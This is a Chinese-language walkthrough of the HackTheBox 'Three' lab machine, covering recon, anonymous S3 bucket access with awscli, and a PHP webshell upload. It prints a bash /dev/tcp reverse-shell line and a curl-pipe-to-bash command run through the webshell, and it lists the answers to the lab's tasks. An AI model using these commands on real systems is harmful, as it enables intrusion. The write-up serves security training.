HackTheBox-Starting Point--Tier 1---Three

---

一 题目

Tags

Web、Cloud、Custom Applications、AWS、AWS、Reconnaissance、Web Site Structure Discovery、Bucket Enumeration、Arbitrary File Upload、Anonymous/Guest Access

译文：Web、云、定制应用程序、AWS、AWS、侦察、网站结构发现、桶枚举、任意文件上传、匿名/访客访问
1
2
3

Connect

To attack the target machine, you must be on the same network.Connect to the Starting Point VPN using one of the following options.
It may take a minute for HTB to recognize your connection.If you don't see an update after 2-3 minutes, refresh the page.

译文：要攻击目标机器，您必须位于同一网络上。使用以下选项之一连接到起点 VPN。
HTB 可能需要一分钟才能识别您的连接。如果 2-3 分钟后没有看到更新，请刷新页面。
1
2
3
4
5

SPAWN MACHINE

Spawn the target machine and the IP will show here.

译文：生成目标机器，IP 将显示在此处
1
2
3

TASK 1

How many TCP ports are open?

译文：打开了多少个 TCP 端口？

答：2
1
2
3
4
5

TASK 2

What is the domain of the email address provided in the "Contact" section of the website?

译文：网站"Contact" 部分中提供的电子邮件地址的域名是什么？

答：thetoppers.htb
1
2
3
4
5

TASK 3

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

译文：在没有 DNS 服务器的情况下，我们可以使用哪个 Linux 文件将主机名解析为 IP 地址，以便能够访问指向这些主机名的网站？

答：/etc/hosts
1
2
3
4
5

TASK 4

Which sub-domain is discovered during further enumeration?

译文：进一步枚举时发现了哪个子域？

答：s3.thetoppers.htb
1
2
3
4
5

TASK 5

Which service is running on the discovered sub-domain?

译文：哪个服务正在发现的子域上运行？

答：Amazon S3
1
2
3
4
5

TASK 6

Which command line utility can be used to interact with the service running on the discovered sub-domain?

译文：哪个命令行实用程序可用于与在发现的子域上运行的服务进行交互？

答：awscli

1
2
3
4
5
6

TASK 7

Which command is used to set up the AWS CLI installation?

译文：使用哪个命令来设置 AWS CLI 安装？

答：aws configure
1
2
3
4
5

TASK 8

What is the command used by the above utility to list all of the S3 buckets?

译文：上述实用程序使用什么命令来列出所有 S3 存储桶？

答：aws s3 ls
1
2
3
4
5

TASK 9

This server is configured to run files written in what web scripting language?

译文：该服务器配置为运行用哪种 Web 脚本语言编写的文件？

答：php
1
2
3
4
5

SUBMIT FLAG

Submit root flag

译文：提交根标志
1
2
3

---

二 实验过程

1.端口扫描

nmap -sV -sC 10.129.251.57
1

2.访问web站点，发现地址邮件域名地址 thetoppers.htb

3.在host文件中绑定域名 thetoppers.htb

4.对主域 thetoppers.htb 进行子域名扫描

5.在host中绑定发现的子域名 s3.thetoppers.htb

6.访问s3.thetoppers.htb子域名发现

S3存储桶： S3 是一种对象存储服务，它将数据作为对象存储在存储桶中。对象是一个文件和描述该文件的任何元数据。桶是存放对象的容器，存储在 Amazon S3存储桶中的文件被称为S3对象 。 它允许我们将东西存储在称为桶的容器中 。 AWS S3存储桶有各种用例，包括备份和存储，媒体托管，软件交付，静态网站等。

7.使用aws客户端程序与S3存储桶交互

#列出服务器上托管的所有S3存储桶
aws --endpoint=http://s3.thetoppers.htb/ s3 ls
1
2

#列出指定存储桶下的对象和常用前缀，发现如下目录，为web网站的根目录
aws --endpoint=http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb
1
2

8.上传webshell

# 在当前目录下创建shell.php
echo 'cmd']);?>' >shell.php

#将shell点php上传到thetoppers.htb下
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
1
2
3
4
5

9.访问shell.php并执行命令

10.反弹shell

#开启http服务器
python3 -m http.server 8000
1
2

# 在当前开启的web服务器目录上创建shell.sh文件，内容如下
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.11/1234 0>& 1
1
2
3

# 开启监听
ncat -lnvp 1234
1
2

# 利用curl从本地web服务器获取shell.sh，并通过管道传递给bash执行，获取到反弹shell
http://thetoppers.htb/shell.php?cmd=curl%2010.10.14.11:8000/shell.sh|bash
1
2

11.查找flag